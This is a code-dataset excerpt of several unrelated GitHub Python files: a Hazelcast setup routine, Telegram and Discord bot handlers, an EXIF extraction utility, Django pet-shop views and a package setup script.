cluster_members=[hazelcast_ip_port],\n data_serializable_factories=hazelcast_serialization_factory)\n # GET all exsiting maps from Hazelcast\n global arion_gateway_cluster_map\n arion_gateway_cluster_map = hazelcast_client.get_map('com.futurewei.common.model.ArionGatewayCluster')\n\n global arion_nodes_map\n arion_nodes_map = hazelcast_client.get_map('com.futurewei.common.model.ArionNode')\n\n global vpc_map\n vpc_map = hazelcast_client.get_map('com.futurewei.common.model.VPC')\n\n global routing_rule_map\n # new table name: com.futurewei.common.model.NeighborRule\n routing_rule_map = hazelcast_client.get_map('com.futurewei.common.model.NeighborRule')\n\n def added(event):\n number_of_entries_in_map = len(routing_rule_map.entry_set().result())\n logger.info(\n f'Entry is added to the map, now the map has {number_of_entries_in_map} entries')\n\n def removed(event):\n number_of_entries_in_map = len(routing_rule_map.entry_set().result())\n logger.info(\n f'Entry is removed from the map, now the map has {number_of_entries_in_map} entries')\n\n # add listeners to the map, listeners will be called when an entries is added/removed from the map\n arion_gateway_cluster_map.add_entry_listener(include_value=True, added_func=added)\n arion_gateway_cluster_map.add_entry_listener(include_value=True, removed_func=removed)\n\n arion_nodes_map.add_entry_listener(include_value=True, added_func=added)\n arion_nodes_map.add_entry_listener(include_value=True, removed_func=removed)\n\n vpc_map.add_entry_listener(include_value=True, added_func=added)\n vpc_map.add_entry_listener(include_value=True, removed_func=removed)\n\n routing_rule_map.add_entry_listener(include_value=True, added_func=added)\n routing_rule_map.add_entry_listener(include_value=True, removed_func=removed)\n logger.info('Finished setting up with Hazelcast.')\n return","repo_name":"futurewei-cloud/arion-dp","sub_path":"src/mgmt/manager/project/api/default_setup.py","file_name":"default_setup.py","file_ext":"py","file_size_in_byte":5616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4554538296","text":"from aiogram import types\nfrom aiogram.types import CallbackQuery\nfrom main import dp\nfrom bot.keyboards import buttons_menu\nfrom bot.create_offer_and_send import game\nfrom bot.data import del_old_messege\nfrom bot.callback_datas import play_collback\nfrom main import db\n\n\n@dp.message_handler(commands=\"start\")\nasync def start(message: types.Message):\n msid = await message.answer(\"Добро пожаловать в бота для изучения Английского языка\\n\"\n \"Для получения информации о возможностях бота используйте команду /info\\n\"\n \"Что бы начать изучение, нажмите /Play\")\n # reply_markup=buttons_menu())\n # удаляем сообщение \"start\"\n await message.delete()\n # Удаляем все сообщения с пометкой удаления\n await del_old_messege(msid)\n # добавляем в БД запись об отправке сообщения, и помечаем его для дальнейшего удаления\n db.add_message(id_chat=msid.chat['id'], id_message=msid['message_id'], delete=1)\n # await save_info_messege(msid)\n\n@dp.message_handler(commands=\"info\")\nasync def info(message: types.Message):\n msid = await message.answer(\"В дальнейшем тут будет выведена информация по работе бота, и команда для запуска тестирования\\n\"\n \"Что бы начать изучение, нажмите /Play\")\n # reply_markup=buttons_menu()) # /start\n # удаляем сообщение \"info\"\n await message.delete()\n # Удаляем все сообщения с пометкой удаления\n await del_old_messege(msid)\n # добавляем в БД запись об отправке сообщения, и помечаем его для дальнейшего удаления\n db.add_message(id_chat=msid.chat['id'], id_message=msid['message_id'], delete=1)\n\n\n@dp.message_handler(commands=\"play\")\nasync def play(message: types.Message):\n # удаляем сообщение \"info\"\n await message.delete()\n # Удаляем все сообщения с пометкой удаления\n await del_old_messege(message)\n # запускаем функцию отправки слова\n await game(message)\n\n@dp.message_handler(commands=\"next_play\")\nasync def vibor_product(message: types.Message):\n # удаляем сообщение\n await message.delete()\n # Удаляем все сообщения с пометкой удаления\n await del_old_messege(message)\n # запускаем функцию отправки слова\n await game(message)\n\n\n@dp.callback_query_handler(play_collback.filter(yes_or_no=\"yes\"))\nasync def inline_yes(call: CallbackQuery, callback_data: dict):\n await call.answer()\n # msid = await call.message.answer(f\"Отлично, вы запомнили эти слова и эту конструкцию предложения!\",\n # reply_markup=buttons_menu())\n await call.message.edit_reply_markup()\n\n # Удаляем все сообщения с пометкой удаления\n # await del_old_messege(msid)\n # добавляем в БД запись об отправке сообщения, и помечаем его для дальнейшего удаления\n # db.add_message(id_chat=msid.chat['id'], id_message=msid['message_id'], delete=1)\n # если правильный ответ, помечаем 1\n db.update(id_chat=call.message.chat.id, id_message=call.message.message_id, status=1)\n # await statistics(message=msid, yes=True)\n\n@dp.callback_query_handler(play_collback.filter(yes_or_no=\"no\"))\nasync def inline_no(call: CallbackQuery, callback_data: dict):\n await call.answer()\n # msid = await call.message.answer(f\"Необходимо выучить используемые слова и повторить конструкции предложения\",\n # reply_markup=buttons_menu())\n await call.message.edit_reply_markup()\n\n # Удаляем все сообщения с пометкой удаления\n # await del_old_messege(msid)\n # добавляем в БД запись об отправке сообщения, и помечаем его для дальнейшего удаления\n # db.add_message(id_chat=msid.chat['id'], id_message=msid['message_id'], delete=1)\n # если правильный ответ, помечаем 1\n db.update(id_chat=call.message.chat.id, id_message=call.message.message_id, status=0)\n # await statistics(message=msid, no=True)\n\n@dp.message_handler(text=\"Статистика\")\nasync def vibor_product(message: types.Message):\n # запрашиваем в БД все сообщения со словами, получаем кортеж\n stat = db.statistics(id_chat=message.chat.id)\n if any(stat):\n mes = await message.answer(f\"Всего задно {stat[0]} вопроса(ов)\\n\"\n f\"Правильно ответили на {stat[1]} вопроса(ов)\\n\"\n f\"Не правильно на {stat[2]} вопроса(ов)\",\n reply_markup=buttons_menu())\n else:\n mes = await message.answer(\"Вы ещё не ответили ни на один вопрос\", reply_markup=buttons_menu())\n\n # удаляем сообщение \"Статистика\"\n await message.delete()\n # Удаляем все сообщения с пометкой удаления\n await del_old_messege(message)\n # добавляем в БД запись об отправке сообщения, и помечаем его для дальнейшего удаления\n db.add_message(id_chat=mes.chat['id'], id_message=mes['message_id'], delete=1)\n\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# handlers_user, тестовый хэндлер!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n@dp.message_handler(commands=[\"user\"])\nasync def user_start(message: types.Message):\n mes = message.chat\n n = db.select_all_chat()\n info_message = await message.answer(f\"Hello, user! Информация о Вас - {mes}\\nВсего пользователей использующих бота - {len(n)}.\\n{n}\", reply_markup=buttons_menu())\n # Удаляем все сообщения с пометкой удаления\n await del_old_messege(message)\n # удаляем сообщение\n await message.delete()\n # добавляем в БД запись об отправке сообщения, и помечаем его для дальнейшего удаления\n db.add_message(id_chat=info_message.chat['id'], id_message=info_message['message_id'], delete=1)\n\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# Хэндлер, должен быть последним, просто удаляет отправленное сообщение!!!!!!!!!!!!!!!!!!!!\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n@dp.message_handler()\nasync def bot_echo(message: types.Message):\n # \"Этот хэндлер ничего не отправляет\"\n await message.delete()","repo_name":"Misha1601/MyEnglishTeacherBot","sub_path":"bot/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34595452155","text":"import pandas as pd\nimport exifread\nimport os\nimport logging\n\nfrom pathlib import Path\nfrom typing import List\nfrom multiprocessing import Pool\nfrom .clean import clean_exif_data\n\n\npicture_globs = [\"*.jpg\", \"*.jpeg\", \"*.png\", \"*.JPG\", \"*.JPEG\", \"*.PNG\"]\n\nPROCESSES_DEFAULT = 5\n\n\ndef get_extension(filename):\n filename, file_extension = os.path.splitext(filename)\n return file_extension.lower()\n\n\ndef get_pictures(directory: Path):\n pics = []\n for glob in picture_globs:\n pics.extend(directory.rglob(glob))\n return pics\n\n\ndef get_exif(path):\n with open(path, \"rb\") as f:\n return clean_exif_data(path, exifread.process_file(f))\n\n\ndef simple_extract_exif(fnames: List[Path]):\n return [get_exif(f) for f in fnames]\n\n\ndef multiprocess_extract_exif(fnames: List[Path], processes: int):\n with Pool(processes) as pool:\n return pool.map(get_exif, fnames)\n\n\ndef get_panda_df(folder_names, processes=PROCESSES_DEFAULT, existing_df=None):\n pics_filenames = []\n for folder in folder_names:\n abs_path = Path(folder).resolve()\n pics_filenames.extend(get_pictures(abs_path))\n\n if existing_df is not None:\n existing_rows = set([Path(p) for p in existing_df[\"filename\"].values])\n pics_filenames = list(set(pics_filenames) - set(existing_rows))\n\n imgs_to_scan = len(pics_filenames)\n\n logging.info(f\"Scanning {imgs_to_scan} new photos\")\n if imgs_to_scan > 1000:\n logging.info(f\"Using {processes} processes. \")\n cleaned_data = multiprocess_extract_exif(pics_filenames, processes)\n else:\n cleaned_data = simple_extract_exif(pics_filenames)\n\n if existing_df is not None:\n cleaned_data.extend(existing_df.to_dict(orient=\"records\"))\n return pd.DataFrame(cleaned_data)\n","repo_name":"Visgean/exif2pandas","sub_path":"exif2pandas/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
+{"seq_id":"21383205113","text":"import discord, os, logging, json, time, random, motor, aiohttp\nfrom discord.ext import commands, tasks\nfrom discord.utils import get\nfrom datetime import datetime as dt\nfrom colorama import Fore as f\nimport button_paginator as pg\nfrom Core import utils as util\nfrom Core.utils import get_theme\n\ndef get_cmds(bot, command:str):\n\texmp3 = [c.qualified_name for c in bot.get_command(command).walk_commands()]\n\texpm_str3 = ','.join(exmp3)\n\tfinal_data = expm_str3.replace(command, '')\n\treturn final_data\n\nasync def format_results(ctx, bot, command: str):\n\tcmds = [c.qualified_name for c in bot.get_command(command).walk_commands()]\n\tdescrips = [c.description for c in bot.get_command(command).walk_commands()]\n\talias = [\", \".join(c.aliases) for c in bot.get_command(command).walk_commands()]\n\tfinal = [f\"**``{ctx.prefix}{cmds}`` · ``({alias})``** | *{descrips}*\\n\" for cmds, alias, descrips in zip(cmds, alias, descrips)]\n\tdes = \"\"\n\tfor i in final:\n\t\tdes+= f\"{i}\"\n\tembed = discord.Embed(title=f\"All {command} commands\", description=f\"**Commands:**\\n{des}\", color=int(await get_theme(self=bot, bot=bot, guild=ctx.guild.id), 16))\n\tembed.set_author(name='blame help & command overview', icon_url=ctx.me.display_avatar.url)\n\tembed.set_footer(text=f\"{ctx.prefix}help [command] for more info on the command.\")\n\treturn embed\n\n\nclass Dropdown(discord.ui.Select):\n\tdef __init__(self, ctx, bot):\n\t\tself.bot = bot\n\t\tself.ctx = ctx\n\t\toptions = [\n\t\t\tdiscord.SelectOption(label='General', description='Main menu'),\n\t\t\tdiscord.SelectOption(label='Autopfp', description=f\"⭐ Premium ⭐\"),\n\t\t\tdiscord.SelectOption(label='Anti-Invite', description=get_cmds(bot=self.bot, command='anti-invite')),\n\t\t\tdiscord.SelectOption(label='Antiraid', description=get_cmds(bot=self.bot, command='antiraid')),\n\t\t\tdiscord.SelectOption(label='Antinuke', description=\"Too many..\"),\n\t\t\tdiscord.SelectOption(label='Autoresponder', description=get_cmds(bot=self.bot, command='autoresponder')),\n\t\t\tdiscord.SelectOption(label='Autorole', description=get_cmds(bot=self.bot, command='autorole')),\n\t\t\tdiscord.SelectOption(label='BoostMsg', description=get_cmds(bot=self.bot, command='boostmsg')),\n\t\t\tdiscord.SelectOption(label='Boosterrole', description=get_cmds(bot=self.bot, command='boosterrole')),\n\t\t\tdiscord.SelectOption(label='FakePerms', description=get_cmds(bot=self.bot, command='fakeperms')),\n\t\t\tdiscord.SelectOption(label='Forcenick', description=get_cmds(bot=self.bot, command='forcenick')),\n\t\t\tdiscord.SelectOption(label='Game', description=get_cmds(bot=self.bot, command='game')),\n\t\t\tdiscord.SelectOption(label='Goodbye', description=\"Too many..\"),\n\t\t\tdiscord.SelectOption(label='Joindm', description=get_cmds(bot=self.bot, command='joindm')),\n\t\t\tdiscord.SelectOption(label='Logging', description=get_cmds(bot=self.bot, command='logging')),\n\t\t\tdiscord.SelectOption(label='LastFM', description=\"Too many..\"),\n\t\t\tdiscord.SelectOption(label='Juul', description=get_cmds(bot=self.bot, command='juul')),\n\t\t\tdiscord.SelectOption(label='Pfp', description=get_cmds(bot=self.bot, command='pfp')),\n\t\t\tdiscord.SelectOption(label='PingOnJoin', description=get_cmds(bot=self.bot, command='poj')),\n\t\t\tdiscord.SelectOption(label='React', description=get_cmds(bot=self.bot, command='react')),\n\t\t\tdiscord.SelectOption(label='ReactionRoles', description=get_cmds(bot=self.bot, command='reaction')),\n\t\t\tdiscord.SelectOption(label='Tags', description=get_cmds(bot=self.bot, command='tags')),\n\t\t\t#discord.SelectOption(label='Twitch Notifications', description=\"Too many..\"),\n\t\t\tdiscord.SelectOption(label='Voicemaster', description=get_cmds(bot=self.bot, command='voice')),\n\t\t\tdiscord.SelectOption(label='Webhooks', description=get_cmds(bot=self.bot, command='webhook')),\n\t\t\tdiscord.SelectOption(label='Welcome', description=\"Too many..\")]\n\t\tsuper().__init__(placeholder='General', min_values=1, max_values=1, options=options)\n\n\tasync def callback(self, interaction: discord.Interaction):\n\t\thelp_type = self.values[0]\n\t\tif help_type == 'General':\n\t\t\tgeneral_embed = discord.Embed(color=000000).set_author(name='blame help & command overview', icon_url=self.ctx.me.display_avatar.url).set_footer(text=f\"The Blame Team ・ Commands: {sum(1 for i in self.bot.walk_commands())}\").add_field(name=\"__Top command__ ``antinuke``\", value=\"*Set a channel that blame will autosend pfps to every five minutes.*\", inline=False).add_field(name=\"\\n__Commands__\", value=\"- View our commands on our **[documentation](https://docs.blame.gg) (in development)**\\n- Or use the dropdown below this message to pick a category\", inline=False).add_field(name=\"__Links__\", value=\"[Help](https://docs.blame.gg) - [Invite the bot](https://discord.com/api/oauth2/authorize?client_id=776128410547126322&permissions=8&scope=bot) - [Support server](https://discord.gg/Xa2ZJr4atx) - [Donate](https://cash.app/$blameW)\")\n\t\t\tawait interaction.response.defer()\n\t\t\tawait interaction.message.edit(embed=general_embed)\n\t\telse:\n\t\t\tawait interaction.response.defer()\n\t\t\tawait interaction.message.edit(embed=await format_results(ctx=self.ctx, bot=self.bot, command=help_type))\n\n\nclass DropdownView(discord.ui.View):\n\tdef __init__(self,ctx, bot):\n\t\tself.ctx = ctx\n\t\tsuper().__init__()\n\n\t\t# Adds the dropdown to our view object.\n\t\tself.add_item(Dropdown(ctx, bot))\n\nclass MyHelp(commands.HelpCommand):\n\tasync def send_bot_help(self, mapping):\n\t\tctx=self.context\n\t\tbot=ctx.bot\n\t\tasync with ctx.typing():\n\t\t\ttry:\n\t\t\t\tview = DropdownView(ctx, bot)\n\t\t\t\tgeneral_embed = discord.Embed(color=int(await get_theme(self, bot=bot, guild=ctx.guild.id), 16)).set_author(name='blame help & command overview', icon_url=ctx.me.display_avatar.url).set_footer(text=f\"The Blame Team ・ Commands: {sum(1 for i in bot.walk_commands())}\").add_field(name=\"__Top command__ ``autopfp``\", value=\"*Set a channel that blame will autosend pfps to every five minutes.*\", inline=False).add_field(name=\"\\n__Commands__\", value=\"- View our commands on our **[documentation](https://docs.blame.gg) (in development)**\\n- Or use the dropdown below this message to pick a category\", inline=False).add_field(name=\"__Links__\", value=\"[Help](https://docs.blame.gg) - [Invite the bot](https://discord.com/api/oauth2/authorize?client_id=776128410547126322&permissions=8&scope=bot) - [Support server](https://discord.gg/Xa2ZJr4atx) - [Donate](https://cash.app/$blameW)\")\n\t\t\t\treturn await ctx.send(embed=general_embed, view=view)\n\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\n\tasync def send_command_help(self, command):\n\t\ttry:\n\t\t\tctx=self.context\n\t\t\tbot=ctx.bot\n\t\t\tasync with ctx.typing():\n\t\t\t\tembed = discord.Embed(title=f\"Command: {command.qualified_name}\", description=f\"{command.description}\", color=int(await get_theme(self, bot=bot, guild=ctx.guild.id), 16))\n\t\t\t\tif command.aliases:\n\t\t\t\t\tembed.add_field(name=\"Aliases\", value=\", \".join(command.aliases), inline=False)\n\t\t\t\telse:\n\t\t\t\t\tembed.add_field(name=\"Aliases\", value=\"None\")\n\t\t\t\tembed.add_field(name=\"⚠️ Parameters\", value=command.brief)\n\t\t\t\tembed.add_field(name=\"🔒 Permissions\", value=command.usage)\n\t\t\t\tif command.help:\n\t\t\t\t\tusage=command.help\n\t\t\t\t\tembed.add_field(name=\"📲 Usage\", value=f\"{usage}\", inline=False)\n\t\t\t\tembed.set_footer(text=f\"Module: {command.cog_name}.py\")\n\t\t\t\tchannel = self.get_destination()\n\t\t\t\tawait channel.send(embed=embed)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\n\n\tasync def send_group_help(self, group):\n\t\tctx=self.context\n\t\tbot = ctx.bot\n\t\tasync with ctx.typing():\n\t\t\tif isinstance(group, commands.Group):\n\t\t\t\tfiltered = await self.filter_commands(group.commands, sort=False)\n\t\t\t\ttot = len(group.commands)\n\t\t\t\tprint(tot)\n\t\t\t\tembedss=[]\n\t\t\t\ttry:\n\t\t\t\t\tfor i in filtered:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tfor ii in i.walk_commands():\n\t\t\t\t\t\t\t\ttot+=1\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tembed1 = discord.Embed(color=int(await get_theme(self, bot=bot, guild=ctx.guild.id), 16))\n\t\t\t\t\tembed1.set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n\t\t\t\t\tif group.brief:\n\t\t\t\t\t\tembedss.append(embed1)\n\t\t\t\t\t\ttot +=1\n\t\t\t\t\t\tembed1.add_field(name=\"⚠️ Parameters\", value=group.brief)\n\n\t\t\t\t\t\tembed1.set_footer(text=\"Aliases: \" + \", \".join(group.aliases)+f\" ・ Module: {group.cog_name}.py ・ Entry: ({len(embedss)}/{tot} entries)\")\n\t\t\t\t\t\tembed1.set_footer(text=\"Aliases: \" + \", \".join(group.aliases)+f\" ・ Module: {group.cog_name}.py ・ Entry: ({len(embedss)}/{tot} entries)\")\n\t\t\t\t\tif group.usage:\n\t\t\t\t\t\tembed1.add_field(name=\"🔒 Permissions\", value=group.usage)\n\t\t\t\t\tif group.description:\n\t\t\t\t\t\tembed1.title=f\"Group Command: {group.qualified_name}\"\n\t\t\t\t\t\tembed1.description=group.description\n\t\t\t\t\tif group.help:\n\t\t\t\t\t\tusage=group.help\n\t\t\t\t\t\tembed1.add_field(name=\"📲 Usage\", value=f\"{usage}\", inline=False)\n\t\t\t\t\t\tembed1.title=f\"Group Command: {group.qualified_name}\"\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e); pass\n\t\t\t\tfor command in filtered:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tfor commandd in command.walk_commands():\n\t\t\t\t\t\t\temb2 = discord.Embed(color=int(await get_theme(self, bot=bot, guild=ctx.guild.id), 16))\n\t\t\t\t\t\t\temb2.set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n\t\t\t\t\t\t\tif commandd.brief:\n\t\t\t\t\t\t\t\tembedss.append(emb2)\n\t\t\t\t\t\t\t\temb2.add_field(name=\"⚠️ Parameters\", value=commandd.brief)\n\t\t\t\t\t\t\t\temb2.set_footer(text=\"Aliases: \" + \", \".join(commandd.aliases)+f\" ・ Module: {commandd.cog_name}.py ・ Entry: ({len(embedss)}/{tot} entries)\")\n\t\t\t\t\t\t\tif commandd.usage:\n\t\t\t\t\t\t\t\temb2.add_field(name=\"🔒 Permissions\", value=commandd.usage)\n\t\t\t\t\t\t\tif commandd.description:\n\t\t\t\t\t\t\t\temb2.title=f\"Command: {commandd.qualified_name}\"\n\t\t\t\t\t\t\t\temb2.description=commandd.description\n\t\t\t\t\t\t\tif commandd.help:\n\t\t\t\t\t\t\t\tusage=commandd.help\n\t\t\t\t\t\t\t\temb2.add_field(name=\"📲 Usage\", value=f\"{usage}\", inline=False)\n\t\t\t\t\t\t\t\temb2.title=f\"Command: {commandd.qualified_name}\"\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\t\t\t\t\t#tot += 1\n\t\t\t\t\temb = discord.Embed(color=int(await get_theme(self, bot=bot, guild=ctx.guild.id), 16))\n\t\t\t\t\temb.set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n\t\t\t\t\tif command.brief:\n\t\t\t\t\t\tembedss.append(emb)\n\t\t\t\t\t\temb.add_field(name=\"⚠️ Parameters\", value=command.brief)\n\t\t\t\t\t\temb.set_footer(text=\"Aliases: \" + \", \".join(command.aliases)+f\" ・ Module: {command.cog_name}.py ・ Entry: ({len(embedss)}/{tot} entries)\")\n\t\t\t\t\tif command.usage:\n\t\t\t\t\t\temb.add_field(name=\"🔒 Permissions\", value=command.usage)\n\t\t\t\t\tif command.description:\n\t\t\t\t\t\temb.title=f\"Command: {command.qualified_name}\"\n\t\t\t\t\t\temb.description=command.description\n\t\t\t\t\tif command.help:\n\t\t\t\t\t\tusage=command.help\n\t\t\t\t\t\temb.add_field(name=\"📲 Usage\", value=f\"{usage}\", inline=False)\n\t\t\t\t\t\temb.title=f\"Command: {command.qualified_name}\"\n\n\t\t\t\tpaginator = pg.Paginator(ctx.bot, embedss, ctx, invoker=ctx.author.id)\n\t\t\t\tif len(embedss) > 1:\n\t\t\t\t\tpaginator.add_button('prev', emoji='', style=discord.ButtonStyle.blurple)\n\t\t\t\t\t#paginator.add_button('first', emoji='<:Settings:921574525815103528>', style=discord.ButtonStyle.green)\n\t\t\t\t\tpaginator.add_button('next', emoji='<:right:921574372693651517>', style=discord.ButtonStyle.blurple)\n\t\t\t\t\tpaginator.add_button('goto', emoji='🔢', style=discord.ButtonStyle.grey)\n\t\t\t\treturn await paginator.start()\n\n\n\n\n\n\tasync def on_help_command_error(self, ctx, error):\n\t\t\ttry:\n\t\t\t\tif isinstance(error, commands.BadArgument):\n\t\t\t\t\tmember = ctx.message.author\n\t\t\t\t\tem = discord.Embed(title=f\" __**Help Panel**__\", description=str(error), color=0xeb041c, timestamp=ctx.message.created_at)\n\t\t\t\t\tem.set_footer(text=f\" Requested by: {ctx.message.author}\")\n\t\t\t\t\tem.add_field(name=f\"__**All Commands:**__\", value='``;cmds``', inline=False)\n\t\t\t\t\tem.add_field(name=f\"__**Command Help:**__\", value=\"``;help [cmd]``\", inline=False)\n\t\t\t\t\tem.add_field(name=f\"__**All Categories:**__\", value='``;categories``', inline=False)\n\t\t\t\t\tem.add_field(name=f\"**links:**\", value=\"[Support serv](https://discord.gg/EGj2GzpU9s) | [Inv blame w/o perms](https://discord.com/api/oauth2/authorize?client_id=776128410547126322&permissions=0&scope=bot) | [Inv blame with perms](https://discord.com/api/oauth2/authorize?client_id=776128410547126322&permissions=8&scope=bot)\", inline=True)\n\t\t\t\t\tawait ctx.send(embed=em)\n\t\t\t\telse:\n\t\t\t\t\traise error\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\t\t\t\tpass\n","repo_name":"inadvertently/Blame","sub_path":"Core/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":12207,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"91"}
+{"seq_id":"8821564246","text":"from django.shortcuts import redirect, render\nfrom .models import Producto, Categoria\nfrom .forms import ProductoForm\n\n\n# Create your views here.\n\n\ndef home(request):\n return render(request, \"core/home.html\")\n\n\ndef producto_tienda(request):\n data = {\"list\": Producto.objects.all().order_by('id')}\n return render(request, \"core/producto_tienda.html\", data)\n\n\ndef producto_ficha(request, id):\n producto = Producto.objects.get(id=id)\n data = {\"producto\": producto}\n return render(request, \"core/producto_ficha.html\", data)\n\n\ndef producto(request, action, id):\n data = {\"mesg\": \"\", \"form\": ProductoForm, \"action\": action, \"id\": id}\n\n\n if action == 'ins':\n if request.method == \"POST\":\n form = ProductoForm(request.POST, request.FILES)\n if form.is_valid:\n try:\n form.save()\n data[\"mesg\"] = \"¡El producto fue creado correctamente!\"\n except:\n data[\"mesg\"] = \"¡No se puede crear dos productos con la misma ID!\"\n\n\n elif action == 'upd':\n objeto = Producto.objects.get(id=id)\n if request.method == \"POST\":\n form = ProductoForm(data=request.POST, files=request.FILES, instance=objeto)\n if form.is_valid:\n form.save()\n data[\"mesg\"] = \"¡El producto fue actualizado correctamente!\"\n data[\"form\"] = ProductoForm(instance=objeto)\n\n\n elif action == 'del':\n try:\n Producto.objects.get(id=id).delete()\n data[\"mesg\"] = \"¡El producto fue eliminado correctamente!\"\n return redirect(producto, action='ins', id = '-1')\n except:\n data[\"mesg\"] = \"¡El producto ya estaba eliminado!\"\n\n\n data[\"list\"] = Producto.objects.all().order_by('id')\n return render(request, \"core/producto.html\", data)\n\ndef poblar_bd(request):\n Producto.objects.all().delete()\n Producto.objects.create(id=\"0001\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$10.000', descuento_sub='5%', descuento_oferta='10%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=1))\n Producto.objects.create(id=\"0002\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$13.500', descuento_sub='5%', descuento_oferta='5%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=2))\n Producto.objects.create(id=\"0003\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$15.000', descuento_sub='5%', descuento_oferta='17%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=3))\n Producto.objects.create(id=\"0004\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$9.000', descuento_sub='5%', descuento_oferta='22%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=1))\n Producto.objects.create(id=\"0005\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$8.500', descuento_sub='5%', descuento_oferta='30%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=2))\n Producto.objects.create(id=\"0006\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$15.500', descuento_sub='5%', descuento_oferta='8%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=3))\n Producto.objects.create(id=\"0007\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$12.000', descuento_sub='5%', descuento_oferta='15%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=1))\n Producto.objects.create(id=\"0008\", nombre='Dog Chow', descripcion=\"Dog Chow adulto\", precio='$8.000', descuento_sub='5%', descuento_oferta='21%', imagen=\"images/dogChow18KG\", categoria=Categoria.objects.get(idCategoria=2))\n \n return redirect(Producto, action='ins', id = '-1')","repo_name":"iahumadaz/PetShop-Django-B","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"69960079985","text":"import os\nimport re\nimport setuptools\nimport sys\n\nif sys.version_info[:2] < (3, 6):\n print(\"ERROR: this package requires Python 3.7 or later!\")\n sys.exit(1)\n# if sys.version_info[:2] >= (3, 9):\n# # This is because of a pickling issue. Maybe dill needs a PR?\n# print(\"ERROR: this package cannot run on Python 3.9 or later!\")\n# sys.exit(1)\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nwith open(os.path.join(\"fastmap\", \"sdk_lib.py\")) as f:\n version = re.search(r\"^CLIENT_VERSION \\= \\\"([0-9.]+)\\\"\", f.read(),\n re.MULTILINE).group(1)\n\nurl_base = \"https://github.com/fastmap-io/fastmap\"\ndownload_url = '%s/archive/fastmap-%s.tar.gz' % (url_base, version)\n\nsetuptools.setup(\n name=\"fastmap\",\n version=version,\n author=\"fastmap.io team\",\n author_email=\"scott@fastmap.io\",\n description=\"Fastmap offloads arbitrary Python code \"\n \"via the open source fastmap cloud service.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=url_base,\n download_url=download_url,\n packages=setuptools.find_packages(),\n scripts=[\n \"scripts/fastmap\",\n \"scripts/fastmapadmin\",\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n install_requires=[\n \"dill>=0.3.2,<0.4\",\n \"msgpack>=1.0.0,<1.1.0\",\n \"requests>=2.24,<3.0\",\n \"tabulate>=0.8.7,<0.9.0\",\n ],\n)\n","repo_name":"fastmap-io/fastmap","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"91"}
